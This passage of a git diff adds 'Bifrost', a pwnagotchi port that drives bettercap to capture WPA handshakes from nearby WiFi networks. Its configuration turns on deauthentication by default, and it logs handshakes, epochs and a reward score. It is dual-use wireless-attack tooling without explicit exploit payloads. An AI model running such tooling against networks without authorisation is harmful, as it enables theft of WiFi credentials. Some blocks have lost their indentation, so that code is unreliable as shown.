loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while not self._stop_event.is_set():
try:
loop.run_until_complete(self.bettercap.start_websocket(
self._on_event, self._stop_event))
except Exception as ex:
if self._stop_event.is_set():
break
logger.debug("Event poller error: %s", ex)
self._stop_event.wait(5)
loop.close()
def _rest_event_loop(self):
"""REST-based fallback event poller — polls /api/events every 2s."""
while not self._stop_event.is_set():
try:
events = self.bettercap.events()
for ev in (events or []):
tag = ev.get('tag', '')
if tag == 'wifi.client.handshake':
# Build a fake websocket message for the existing handler
import asyncio as _aio
_loop = _aio.new_event_loop()
_loop.run_until_complete(self._on_event(json.dumps(ev)))
_loop.close()
except Exception as ex:
logger.debug("REST event poll error: %s", ex)
self._stop_event.wait(2)
    async def _on_event(self, msg):
        """Handle bettercap websocket events.

        *msg* is the raw JSON string from the socket. Only
        ``wifi.client.handshake`` events are acted upon; everything else
        is silently ignored.
        """
        try:
            jmsg = json.loads(msg)
        except json.JSONDecodeError:
            # Malformed frame — drop it rather than kill the listener.
            return
        if jmsg.get('tag') == 'wifi.client.handshake':
            filename = jmsg.get('data', {}).get('file', '')
            sta_mac = jmsg.get('data', {}).get('station', '')
            ap_mac = jmsg.get('data', {}).get('ap', '')
            # Deduplicate on the station->AP pair: bettercap can report the
            # same handshake more than once.
            key = "%s -> %s" % (sta_mac, ap_mac)
            if key not in self._handshakes:
                self._handshakes[key] = jmsg
                self._last_pwnd = ap_mac
                # Find AP info — prefer a human-readable ESSID over the MAC.
                ap_name = ap_mac
                try:
                    s = self.bettercap.session()
                    for ap in s.get('wifi', {}).get('aps', []):
                        if ap.get('mac') == ap_mac:
                            if ap.get('hostname') and ap['hostname'] != '<hidden>':
                                ap_name = ap['hostname']
                            break
                except Exception:
                    # Best effort only; fall back to the MAC as the name.
                    pass
                logger.warning("!!! HANDSHAKE: %s -> %s !!!", sta_mac, ap_name)
                self.epoch.track(handshake=True)
                self._persist_handshake(ap_mac, sta_mac, ap_name, filename)
                self._log_activity('handshake',
                                   'Handshake: %s' % ap_name,
                                   self.voice.on_handshakes(1))
                plugins.on('handshake', filename, ap_mac, sta_mac)
def start_session_fetcher(self):
"""Start background thread that polls bettercap for stats."""
t = threading.Thread(target=self._fetch_stats, daemon=True, name="BifrostStats")
t.start()
def _fetch_stats(self):
while not self._stop_event.is_set():
try:
s = self.bettercap.session()
self._tot_aps = len(s.get('wifi', {}).get('aps', []))
except Exception:
pass
self._stop_event.wait(2)
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return current agent state for the web API."""
return {
'mood': self.automata.mood,
'face': self.automata.face,
'voice': self.automata.voice_text,
'channel': self._current_channel,
'num_aps': self._tot_aps,
'num_handshakes': len(self._handshakes),
'uptime': int(time.time() - self._started_at),
'epoch': self.epoch.epoch,
'mode': self.mode,
'last_pwnd': self._last_pwnd or '',
'reward': self.epoch.data().get('reward', 0),
}
# ── DB persistence ────────────────────────────────────
    def _persist_networks(self, aps):
        """Upsert discovered networks to DB.

        One row per BSSID; re-sightings refresh metadata and last_seen.
        The parameter tuple repeats the field values because the UPSERT
        uses positional placeholders in both the INSERT and UPDATE parts.
        """
        for ap in aps:
            try:
                self.db.execute(
                    """INSERT INTO bifrost_networks
                    (bssid, essid, channel, encryption, rssi, vendor, num_clients, last_seen)
                    VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
                    ON CONFLICT(bssid) DO UPDATE SET
                    essid=?, channel=?, encryption=?, rssi=?, vendor=?,
                    num_clients=?, last_seen=CURRENT_TIMESTAMP""",
                    (ap.get('mac', ''), ap.get('hostname', ''), ap.get('channel', 0),
                     ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
                     len(ap.get('clients', [])),
                     ap.get('hostname', ''), ap.get('channel', 0),
                     ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
                     len(ap.get('clients', [])))
                )
            except Exception as e:
                # Per-AP failures must not abort the rest of the batch.
                logger.debug("Error persisting network: %s", e)
    def _persist_handshake(self, ap_mac, sta_mac, ap_name, filename):
        """Record a captured handshake; duplicate rows are silently ignored
        (INSERT OR IGNORE)."""
        try:
            self.db.execute(
                """INSERT OR IGNORE INTO bifrost_handshakes
                (ap_mac, sta_mac, ap_essid, filename)
                VALUES (?, ?, ?, ?)""",
                (ap_mac, sta_mac, ap_name, filename)
            )
        except Exception as e:
            # Persistence is best-effort; the capture file itself remains.
            logger.debug("Error persisting handshake: %s", e)
    def _persist_epoch(self, data):
        """Persist one finished epoch's summary row.

        *data* is the dict produced by BifrostEpoch.data(); the epoch
        counter has already advanced, hence ``self.epoch.epoch - 1``.
        """
        try:
            self.db.execute(
                """INSERT INTO bifrost_epochs
                (epoch_num, started_at, duration_secs, num_deauths, num_assocs,
                num_handshakes, num_hops, num_missed, num_peers, mood, reward,
                cpu_load, mem_usage, temperature, meta_json)
                VALUES (?, datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
                (self.epoch.epoch - 1, data.get('duration_secs', 0),
                 data.get('num_deauths', 0), data.get('num_associations', 0),
                 data.get('num_handshakes', 0), data.get('num_hops', 0),
                 data.get('missed_interactions', 0), data.get('num_peers', 0),
                 self.automata.mood, data.get('reward', 0),
                 data.get('cpu_load', 0), data.get('mem_usage', 0),
                 data.get('temperature', 0), '{}')
            )
        except Exception as e:
            logger.debug("Error persisting epoch: %s", e)
    def _log_activity(self, event_type, title, details=''):
        """Log an activity event to the DB.

        The message is mirrored to ``automata.voice_text`` first (surfaced
        as 'voice' in get_status) so it is visible even if the DB write
        below fails.
        """
        self.automata.voice_text = details or title
        try:
            self.db.execute(
                """INSERT INTO bifrost_activity (event_type, title, details)
                VALUES (?, ?, ?)""",
                (event_type, title, details)
            )
        except Exception as e:
            logger.debug("Error logging activity: %s", e)

168
bifrost/automata.py Normal file
View File

@@ -0,0 +1,168 @@
"""
Bifrost — Mood state machine.
Ported from pwnagotchi/automata.py.
"""
import logging
from bifrost import plugins as plugins
from bifrost.faces import MOOD_FACES
from logger import Logger
logger = Logger(name="bifrost.automata", level=logging.DEBUG)
class BifrostAutomata:
    """Evaluates epoch data and transitions between moods.

    Mood changes update ``self.mood``/``self.face`` and fire the matching
    plugin event. Several "negative" moods (lonely/bored/sad/angry) are
    softened to 'grateful' when the unit has enough peer encounters
    (see _has_support_network_for).
    """
    def __init__(self, config):
        self._config = config
        self.mood = 'starting'
        self.face = MOOD_FACES.get('starting', '(. .)')
        self.voice_text = ''
        self._peers = {} # peer_id -> peer_data
    @property
    def peers(self):
        return self._peers
    def _set_mood(self, mood):
        # Face falls back to a neutral default for unknown mood names.
        self.mood = mood
        self.face = MOOD_FACES.get(mood, '(. .)')
    def set_starting(self):
        self._set_mood('starting')
    def set_ready(self):
        self._set_mood('ready')
        plugins.on('ready')
    def _has_support_network_for(self, factor):
        """True when accumulated peer encounters outweigh *factor*.

        Peers may be dicts or objects — both encounter representations
        are supported.
        """
        bond_factor = self._config.get('bifrost_personality_bond_factor', 20000)
        total_encounters = sum(
            p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
            for p in self._peers.values()
        )
        support_factor = total_encounters / bond_factor
        return support_factor >= factor
    def in_good_mood(self):
        return self._has_support_network_for(1.0)
    def set_grateful(self):
        self._set_mood('grateful')
        plugins.on('grateful')
    def set_lonely(self):
        # Enough friends converts loneliness into gratitude.
        if not self._has_support_network_for(1.0):
            logger.info("unit is lonely")
            self._set_mood('lonely')
            plugins.on('lonely')
        else:
            logger.info("unit is grateful instead of lonely")
            self.set_grateful()
    def set_bored(self, inactive_for):
        bored_epochs = self._config.get('bifrost_personality_bored_epochs', 15)
        factor = inactive_for / bored_epochs if bored_epochs else 1
        if not self._has_support_network_for(factor):
            logger.warning("%d epochs with no activity -> bored", inactive_for)
            self._set_mood('bored')
            plugins.on('bored')
        else:
            logger.info("unit is grateful instead of bored")
            self.set_grateful()
    def set_sad(self, inactive_for):
        sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
        factor = inactive_for / sad_epochs if sad_epochs else 1
        if not self._has_support_network_for(factor):
            logger.warning("%d epochs with no activity -> sad", inactive_for)
            self._set_mood('sad')
            plugins.on('sad')
        else:
            logger.info("unit is grateful instead of sad")
            self.set_grateful()
    def set_angry(self, factor):
        if not self._has_support_network_for(factor):
            logger.warning("too many misses -> angry (factor=%.1f)", factor)
            self._set_mood('angry')
            plugins.on('angry')
        else:
            logger.info("unit is grateful instead of angry")
            self.set_grateful()
    def set_excited(self):
        logger.warning("lots of activity -> excited")
        self._set_mood('excited')
        plugins.on('excited')
    def set_rebooting(self):
        # Intentionally shows the 'broken' face while restarting.
        self._set_mood('broken')
        plugins.on('rebooting')
    def next_epoch(self, epoch):
        """Evaluate epoch state and transition mood.
        Args:
            epoch: BifrostEpoch instance
        """
        # Snapshot miss counters BEFORE epoch.next() resets them.
        was_stale = epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
        did_miss = epoch.num_missed
        # Trigger epoch transition (resets counters, computes reward)
        epoch.next()
        max_misses = self._config.get('bifrost_personality_max_misses', 8)
        excited_threshold = self._config.get('bifrost_personality_excited_epochs', 10)
        # Mood evaluation (same logic as pwnagotchi automata.py)
        if was_stale:
            factor = did_miss / max_misses if max_misses else 1
            if factor >= 2.0:
                self.set_angry(factor)
            else:
                logger.warning("agent missed %d interactions -> lonely", did_miss)
                self.set_lonely()
        elif epoch.sad_for:
            sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
            factor = epoch.inactive_for / sad_epochs if sad_epochs else 1
            if factor >= 2.0:
                self.set_angry(factor)
            else:
                self.set_sad(epoch.inactive_for)
        elif epoch.bored_for:
            self.set_bored(epoch.inactive_for)
        elif epoch.active_for >= excited_threshold:
            self.set_excited()
        elif epoch.active_for >= 5 and self._has_support_network_for(5.0):
            self.set_grateful()
        # epoch.epoch was incremented by next(); report the finished one.
        plugins.on('epoch', epoch.epoch - 1, epoch.data())
    def on_miss(self, who):
        logger.info("it looks like %s is not in range anymore :/", who)
    def on_error(self, who, e):
        # bettercap raises this message when a target AP disappeared.
        if 'is an unknown BSSID' in str(e):
            self.on_miss(who)
        else:
            logger.error(str(e))
    def is_stale(self, epoch):
        return epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
    def wait_for(self, t, epoch, sleeping=True, stop_event=None):
        """Wait and track sleep time.
        If *stop_event* is provided the wait is interruptible so the
        engine can shut down quickly even during long recon windows.
        """
        plugins.on('sleep' if sleeping else 'wait', t)
        epoch.track(sleep=True, inc=t)
        import time
        if stop_event is not None:
            stop_event.wait(t)
        else:
            time.sleep(t)

103
bifrost/bettercap.py Normal file
View File

@@ -0,0 +1,103 @@
"""
Bifrost — Bettercap REST API client.
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
import logging
import base64
import urllib.request
import urllib.error
from logger import Logger
logger = Logger(name="bifrost.bettercap", level=logging.DEBUG)
class BettercapClient:
    """Synchronous REST client for the bettercap API.

    Uses only urllib (no `requests` dependency). Credentials are sent as
    HTTP Basic auth; the websocket URL embeds them as userinfo.
    """
    def __init__(self, hostname='127.0.0.1', scheme='http', port=8081,
                 username='user', password='pass'):
        self.hostname = hostname
        self.scheme = scheme
        self.port = port
        self.username = username
        self.password = password
        self.url = "%s://%s:%d/api" % (scheme, hostname, port)
        self.websocket = "ws://%s:%s@%s:%d/api" % (username, password, hostname, port)
        # Pre-computed Basic auth header, reused for every request.
        self._auth_header = 'Basic ' + base64.b64encode(
            ('%s:%s' % (username, password)).encode()
        ).decode()
    def _request(self, method, path, data=None, verbose_errors=True):
        """Make an HTTP request to bettercap API.

        Returns parsed JSON when the response is valid JSON, otherwise the
        raw text. Raises Exception on HTTP errors or connection failure.
        """
        url = "%s%s" % (self.url, path)
        body = json.dumps(data).encode() if data else None
        req = urllib.request.Request(url, data=body, method=method)
        req.add_header('Authorization', self._auth_header)
        if body:
            req.add_header('Content-Type', 'application/json')
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                raw = resp.read().decode('utf-8')
                try:
                    return json.loads(raw)
                except json.JSONDecodeError:
                    # Some endpoints return plain text — pass it through.
                    return raw
        except urllib.error.HTTPError as e:
            err = "error %d: %s" % (e.code, e.read().decode('utf-8', errors='replace').strip())
            if verbose_errors:
                logger.info(err)
            raise Exception(err)
        except urllib.error.URLError as e:
            raise Exception("bettercap unreachable: %s" % e.reason)
    def session(self):
        """GET /api/session — current bettercap state."""
        return self._request('GET', '/session')
    def run(self, command, verbose_errors=True):
        """POST /api/session — execute a bettercap command."""
        return self._request('POST', '/session', {'cmd': command},
                             verbose_errors=verbose_errors)
    def events(self):
        """GET /api/events — poll recent events (REST fallback).

        Returns a list (possibly empty); never raises.
        """
        try:
            result = self._request('GET', '/events', verbose_errors=False)
            # Clear after reading so we don't reprocess
            try:
                self.run('events.clear', verbose_errors=False)
            except Exception:
                pass
            return result if isinstance(result, list) else []
        except Exception:
            return []
    async def start_websocket(self, consumer, stop_event=None):
        """Connect to bettercap websocket event stream.
        Args:
            consumer: async callable that receives each message string.
            stop_event: optional threading.Event — exit when set.
        """
        import websockets
        import asyncio
        ws_url = "%s/events" % self.websocket
        # Reconnect loop: any socket failure waits 2s and tries again
        # until stop_event (when given) is set.
        while not (stop_event and stop_event.is_set()):
            try:
                async with websockets.connect(ws_url, ping_interval=60,
                                              ping_timeout=90) as ws:
                    async for msg in ws:
                        if stop_event and stop_event.is_set():
                            return
                        try:
                            await consumer(msg)
                        except Exception as ex:
                            logger.debug("Error parsing event: %s", ex)
            except Exception as ex:
                if stop_event and stop_event.is_set():
                    return
                logger.debug("Websocket error: %s — reconnecting...", ex)
                await asyncio.sleep(2)

185
bifrost/compat.py Normal file
View File

@@ -0,0 +1,185 @@
"""
Bifrost — Pwnagotchi compatibility shim.
Registers `pwnagotchi` in sys.modules so existing plugins can
`import pwnagotchi` and get Bifrost-backed implementations.
"""
import sys
import time
import types
import os
def install_shim(shared_data, bifrost_plugins_module):
    """Install the pwnagotchi namespace shim into sys.modules.

    Call this BEFORE loading any pwnagotchi plugins so their
    `import pwnagotchi` resolves to our shim.
    """
    started = time.time()

    shim = types.ModuleType('pwnagotchi')
    shim.__version__ = '2.0.0-bifrost'
    shim.__file__ = __file__
    shim.config = _build_compat_config(shared_data)

    def _name():
        return shared_data.config.get('bjorn_name', 'bifrost')

    def _set_name(n):
        # Name is owned by the Bjorn config; plugin writes are ignored.
        pass

    def _uptime():
        return time.time() - started

    def _cpu_load():
        try:
            return os.getloadavg()[0]
        except (OSError, AttributeError):
            return 0.0

    def _mem_usage():
        # Fraction of RAM in use, from /proc/meminfo (Linux only).
        try:
            with open('/proc/meminfo', 'r') as f:
                lines = f.readlines()
            total = int(lines[0].split()[1])
            available = int(lines[2].split()[1])
            return (total - available) / total if total else 0.0
        except Exception:
            return 0.0

    def _temperature():
        try:
            with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
                return int(f.read().strip()) / 1000.0
        except Exception:
            return 0.0

    def _reboot():
        # Bifrost never auto-reboots the host.
        pass

    shim.name = _name
    shim.set_name = _set_name
    shim.uptime = _uptime
    shim.cpu_load = _cpu_load
    shim.mem_usage = _mem_usage
    shim.temperature = _temperature
    shim.reboot = _reboot

    # Register modules so `import pwnagotchi[.plugins|.utils]` resolves here.
    sys.modules['pwnagotchi'] = shim
    sys.modules['pwnagotchi.plugins'] = bifrost_plugins_module
    sys.modules['pwnagotchi.utils'] = _build_utils_shim(shared_data)
def _build_compat_config(shared_data):
"""Translate Bjorn's flat bifrost_* config to pwnagotchi's nested format."""
cfg = shared_data.config
return {
'main': {
'name': cfg.get('bjorn_name', 'bifrost'),
'iface': cfg.get('bifrost_iface', 'wlan0mon'),
'mon_start_cmd': '',
'no_restart': False,
'filter': cfg.get('bifrost_filter', ''),
'whitelist': [
w.strip() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
],
'plugins': cfg.get('bifrost_plugins', {}),
'custom_plugins': cfg.get('bifrost_plugins_path', ''),
'mon_max_blind_epochs': 50,
},
'personality': {
'ap_ttl': cfg.get('bifrost_personality_ap_ttl', 120),
'sta_ttl': cfg.get('bifrost_personality_sta_ttl', 300),
'min_rssi': cfg.get('bifrost_personality_min_rssi', -200),
'associate': cfg.get('bifrost_personality_associate', True),
'deauth': cfg.get('bifrost_personality_deauth', True),
'recon_time': cfg.get('bifrost_personality_recon_time', 30),
'hop_recon_time': cfg.get('bifrost_personality_hop_recon_time', 10),
'min_recon_time': cfg.get('bifrost_personality_min_recon_time', 5),
'max_inactive_scale': 3,
'recon_inactive_multiplier': 2,
'max_interactions': cfg.get('bifrost_personality_max_interactions', 3),
'max_misses_for_recon': cfg.get('bifrost_personality_max_misses', 8),
'excited_num_epochs': cfg.get('bifrost_personality_excited_epochs', 10),
'bored_num_epochs': cfg.get('bifrost_personality_bored_epochs', 15),
'sad_num_epochs': cfg.get('bifrost_personality_sad_epochs', 25),
'bond_encounters_factor': cfg.get('bifrost_personality_bond_factor', 20000),
'channels': [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
],
},
'bettercap': {
'hostname': cfg.get('bifrost_bettercap_host', '127.0.0.1'),
'scheme': 'http',
'port': cfg.get('bifrost_bettercap_port', 8081),
'username': cfg.get('bifrost_bettercap_user', 'user'),
'password': cfg.get('bifrost_bettercap_pass', 'pass'),
'handshakes': cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes'),
'silence': [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
],
},
'ai': {
'enabled': cfg.get('bifrost_ai_enabled', False),
'path': '/root/bifrost/brain.json',
},
'ui': {
'fps': 1.0,
'web': {'enabled': False},
'display': {'enabled': False},
},
}
def _build_utils_shim(shared_data):
"""Minimal pwnagotchi.utils shim."""
mod = types.ModuleType('pwnagotchi.utils')
def secs_to_hhmmss(secs):
h = int(secs // 3600)
m = int((secs % 3600) // 60)
s = int(secs % 60)
return "%d:%02d:%02d" % (h, m, s)
def iface_channels(iface):
"""Return available channels for interface."""
try:
import subprocess
out = subprocess.check_output(
['iwlist', iface, 'channel'],
stderr=subprocess.DEVNULL, timeout=5
).decode()
channels = []
for line in out.split('\n'):
if 'Channel' in line and 'Current' not in line:
parts = line.strip().split()
for p in parts:
try:
ch = int(p)
if 1 <= ch <= 14:
channels.append(ch)
except ValueError:
continue
return sorted(set(channels)) if channels else list(range(1, 15))
except Exception:
return list(range(1, 15))
def total_unique_handshakes(path):
"""Count unique handshake files in directory."""
import glob as _glob
if not os.path.isdir(path):
return 0
return len(_glob.glob(os.path.join(path, '*.pcap')))
mod.secs_to_hhmmss = secs_to_hhmmss
mod.iface_channels = iface_channels
mod.total_unique_handshakes = total_unique_handshakes
return mod

292
bifrost/epoch.py Normal file
View File

@@ -0,0 +1,292 @@
"""
Bifrost — Epoch tracking.
Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
import threading
import logging
import os
from logger import Logger
logger = Logger(name="bifrost.epoch", level=logging.DEBUG)
NUM_CHANNELS = 14  # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────
class RewardFunction:
    """Reward signal for RL — higher is better."""
    def __call__(self, epoch_n, state):
        # eps keeps every ratio finite for brand-new units with all-zero
        # counters.
        eps = 1e-20
        total_epochs = epoch_n + eps
        interactions = max(
            state['num_deauths'] + state['num_associations'],
            state['num_handshakes']
        ) + eps

        # Positive terms: handshakes dominate; activity streak and
        # channel coverage add smaller bonuses.
        handshake_term = state['num_handshakes'] / interactions
        active_term = 0.2 * (state['active_for_epochs'] / total_epochs)
        hop_term = 0.1 * (state['num_hops'] / NUM_CHANNELS)

        # Negative terms: blindness, inactivity and missed interactions.
        blind_term = -0.3 * (state['blind_for_epochs'] / total_epochs)
        miss_term = -0.3 * (state['missed_interactions'] / interactions)
        inactive_term = -0.2 * (state['inactive_for_epochs'] / total_epochs)

        # Mood penalties only kick in after 5+ consecutive epochs.
        sad = state['sad_for_epochs'] if state['sad_for_epochs'] >= 5 else 0
        bored = state['bored_for_epochs'] if state['bored_for_epochs'] >= 5 else 0
        sad_term = -0.2 * (sad / total_epochs)
        bored_term = -0.1 * (bored / total_epochs)

        return (handshake_term + active_term + hop_term + blind_term
                + inactive_term + miss_term + sad_term + bored_term)
# ── Epoch state ──────────────────────────────────────────────────
class BifrostEpoch:
    """Tracks per-epoch counters, observations, and reward.

    An "epoch" is one recon/interaction cycle. Counters accumulate via
    track()/observe() and are folded into a summary dict (plus reward)
    by next(), which then resets them for the following epoch.
    """
    def __init__(self, config):
        self.epoch = 0
        self.config = config
        # Consecutive epoch counters (streaks across epochs)
        self.inactive_for = 0
        self.active_for = 0
        self.blind_for = 0
        self.sad_for = 0
        self.bored_for = 0
        # Per-epoch action flags & counters (reset each epoch)
        self.did_deauth = False
        self.num_deauths = 0
        self.did_associate = False
        self.num_assocs = 0
        self.num_missed = 0
        self.did_handshakes = False
        self.num_shakes = 0
        self.num_hops = 0
        self.num_slept = 0
        self.num_peers = 0
        self.tot_bond_factor = 0.0
        self.avg_bond_factor = 0.0
        self.any_activity = False
        # Timing
        self.epoch_started = time.time()
        self.epoch_duration = 0
        # Channel histograms for AI observation
        self.non_overlapping_channels = {1: 0, 6: 0, 11: 0}
        self._observation = {
            'aps_histogram': [0.0] * NUM_CHANNELS,
            'sta_histogram': [0.0] * NUM_CHANNELS,
            'peers_histogram': [0.0] * NUM_CHANNELS,
        }
        self._observation_ready = threading.Event()
        self._epoch_data = {}
        self._epoch_data_ready = threading.Event()
        self._reward = RewardFunction()
    def wait_for_epoch_data(self, with_observation=True, timeout=None):
        """Block until next() publishes the epoch summary; optionally
        merge in the latest channel-histogram observation."""
        self._epoch_data_ready.wait(timeout)
        self._epoch_data_ready.clear()
        if with_observation:
            return {**self._observation, **self._epoch_data}
        return self._epoch_data
    def data(self):
        # Summary of the LAST finished epoch (empty dict before first next()).
        return self._epoch_data
    def observe(self, aps, peers):
        """Update observation histograms from current AP/peer lists.

        Also maintains the blind-epoch streak (no APs visible at all).
        Peers may be dicts or objects.
        """
        num_aps = len(aps)
        if num_aps == 0:
            self.blind_for += 1
        else:
            self.blind_for = 0
        bond_unit_scale = self.config.get('bifrost_personality_bond_factor', 20000)
        self.num_peers = len(peers)
        # Tiny epsilon avoids division by zero when normalizing below.
        num_peers = self.num_peers + 1e-10
        self.tot_bond_factor = sum(
            p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
            for p in peers
        ) / bond_unit_scale
        self.avg_bond_factor = self.tot_bond_factor / num_peers
        num_aps_f = len(aps) + 1e-10
        num_sta = sum(len(ap.get('clients', [])) for ap in aps) + 1e-10
        aps_per_chan = [0.0] * NUM_CHANNELS
        sta_per_chan = [0.0] * NUM_CHANNELS
        peers_per_chan = [0.0] * NUM_CHANNELS
        for ap in aps:
            # Channels are 1-based; histogram indices are 0-based.
            ch_idx = ap.get('channel', 1) - 1
            if 0 <= ch_idx < NUM_CHANNELS:
                aps_per_chan[ch_idx] += 1.0
                sta_per_chan[ch_idx] += len(ap.get('clients', []))
        for peer in peers:
            ch = peer.get('last_channel', 0) if isinstance(peer, dict) else getattr(peer, 'last_channel', 0)
            ch_idx = ch - 1
            if 0 <= ch_idx < NUM_CHANNELS:
                peers_per_chan[ch_idx] += 1.0
        # Normalize
        aps_per_chan = [e / num_aps_f for e in aps_per_chan]
        sta_per_chan = [e / num_sta for e in sta_per_chan]
        peers_per_chan = [e / num_peers for e in peers_per_chan]
        self._observation = {
            'aps_histogram': aps_per_chan,
            'sta_histogram': sta_per_chan,
            'peers_histogram': peers_per_chan,
        }
        self._observation_ready.set()
    def track(self, deauth=False, assoc=False, handshake=False,
              hop=False, sleep=False, miss=False, inc=1):
        """Increment epoch counters."""
        if deauth:
            self.num_deauths += inc
            self.did_deauth = True
            self.any_activity = True
        if assoc:
            self.num_assocs += inc
            self.did_associate = True
            self.any_activity = True
        if miss:
            self.num_missed += inc
        if hop:
            self.num_hops += inc
            # Reset per-channel flags on hop
            self.did_deauth = False
            self.did_associate = False
        if handshake:
            self.num_shakes += inc
            self.did_handshakes = True
        if sleep:
            self.num_slept += inc
    def next(self):
        """Transition to next epoch — compute reward, update streaks, reset counters."""
        # Update activity streaks
        if not self.any_activity and not self.did_handshakes:
            self.inactive_for += 1
            self.active_for = 0
        else:
            self.active_for += 1
            self.inactive_for = 0
            self.sad_for = 0
            self.bored_for = 0
        # Sad takes precedence over bored once inactivity is long enough;
        # the two streaks are mutually exclusive.
        sad_threshold = self.config.get('bifrost_personality_sad_epochs', 25)
        bored_threshold = self.config.get('bifrost_personality_bored_epochs', 15)
        if self.inactive_for >= sad_threshold:
            self.bored_for = 0
            self.sad_for += 1
        elif self.inactive_for >= bored_threshold:
            self.sad_for = 0
            self.bored_for += 1
        else:
            self.sad_for = 0
            self.bored_for = 0
        now = time.time()
        self.epoch_duration = now - self.epoch_started
        # System metrics
        cpu = _cpu_load()
        mem = _mem_usage()
        temp = _temperature()
        # Cache epoch data for other threads
        self._epoch_data = {
            'duration_secs': self.epoch_duration,
            'slept_for_secs': self.num_slept,
            'blind_for_epochs': self.blind_for,
            'inactive_for_epochs': self.inactive_for,
            'active_for_epochs': self.active_for,
            'sad_for_epochs': self.sad_for,
            'bored_for_epochs': self.bored_for,
            'missed_interactions': self.num_missed,
            'num_hops': self.num_hops,
            'num_peers': self.num_peers,
            'tot_bond': self.tot_bond_factor,
            'avg_bond': self.avg_bond_factor,
            'num_deauths': self.num_deauths,
            'num_associations': self.num_assocs,
            'num_handshakes': self.num_shakes,
            'cpu_load': cpu,
            'mem_usage': mem,
            'temperature': temp,
        }
        self._epoch_data['reward'] = self._reward(self.epoch + 1, self._epoch_data)
        # Wake any thread blocked in wait_for_epoch_data().
        self._epoch_data_ready.set()
        logger.info(
            "[epoch %d] dur=%ds blind=%d sad=%d bored=%d inactive=%d active=%d "
            "hops=%d missed=%d deauths=%d assocs=%d shakes=%d reward=%.3f",
            self.epoch, int(self.epoch_duration), self.blind_for,
            self.sad_for, self.bored_for, self.inactive_for, self.active_for,
            self.num_hops, self.num_missed, self.num_deauths, self.num_assocs,
            self.num_shakes, self._epoch_data['reward'],
        )
        # Reset for next epoch
        self.epoch += 1
        self.epoch_started = now
        self.did_deauth = False
        self.num_deauths = 0
        self.num_peers = 0
        self.tot_bond_factor = 0.0
        self.avg_bond_factor = 0.0
        self.did_associate = False
        self.num_assocs = 0
        self.num_missed = 0
        self.did_handshakes = False
        self.num_shakes = 0
        self.num_hops = 0
        self.num_slept = 0
        self.any_activity = False
# ── System metric helpers ────────────────────────────────────────
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0

66
bifrost/faces.py Normal file
View File

@@ -0,0 +1,66 @@
"""
Bifrost — ASCII face definitions.
Ported from pwnagotchi/ui/faces.py with full face set.
"""
# Face constants. The \uXXXX escapes render as small unicode "eyes" on
# the display; names describe the expression, not the exact glyphs.
LOOK_R = '( \u2686_\u2686)'
LOOK_L = '(\u2609_\u2609 )'
LOOK_R_HAPPY = '( \u25d5\u203f\u25d5)'
LOOK_L_HAPPY = '(\u25d5\u203f\u25d5 )'
SLEEP = '(\u21c0\u203f\u203f\u21bc)'
SLEEP2 = '(\u2256\u203f\u203f\u2256)'
AWAKE = '(\u25d5\u203f\u203f\u25d5)'
BORED = '(-__-)'
INTENSE = '(\u00b0\u25c3\u25c3\u00b0)'
COOL = '(\u2310\u25a0_\u25a0)'
HAPPY = '(\u2022\u203f\u203f\u2022)'
GRATEFUL = '(^\u203f\u203f^)'
EXCITED = '(\u1d54\u25e1\u25e1\u1d54)'
MOTIVATED = '(\u263c\u203f\u203f\u263c)'
DEMOTIVATED = '(\u2256__\u2256)'
SMART = '(\u271c\u203f\u203f\u271c)'
LONELY = '(\u0628__\u0628)'
SAD = '(\u2565\u2601\u2565 )'
ANGRY = "(-_-')"
FRIEND = '(\u2665\u203f\u203f\u2665)'
BROKEN = '(\u2613\u203f\u203f\u2613)'
DEBUG = '(#__#)'
UPLOAD = '(1__0)'
UPLOAD1 = '(1__1)'
UPLOAD2 = '(0__1)'
STARTING = '(. .)'
READY = '( ^_^)'
# Map mood name → face constant
# NOTE: the dict captures the constants' values at import time; a later
# rebind of a constant alone does not change this table (see
# load_from_config, which updates both).
MOOD_FACES = {
    'starting': STARTING,
    'ready': READY,
    'sleeping': SLEEP,
    'awake': AWAKE,
    'bored': BORED,
    'sad': SAD,
    'angry': ANGRY,
    'excited': EXCITED,
    'lonely': LONELY,
    'grateful': GRATEFUL,
    'happy': HAPPY,
    'cool': COOL,
    'intense': INTENSE,
    'motivated': MOTIVATED,
    'demotivated': DEMOTIVATED,
    'friend': FRIEND,
    'broken': BROKEN,
    'debug': DEBUG,
    'smart': SMART,
}
def load_from_config(config):
    """Override faces from config dict (e.g. custom emojis)."""
    for face_name, face_value in (config or {}).items():
        # Rebind the module-level constant (e.g. HAPPY) if one matches...
        const_key = face_name.upper()
        if const_key in globals():
            globals()[const_key] = face_value
        # ...and update the mood lookup table when the key is a mood name.
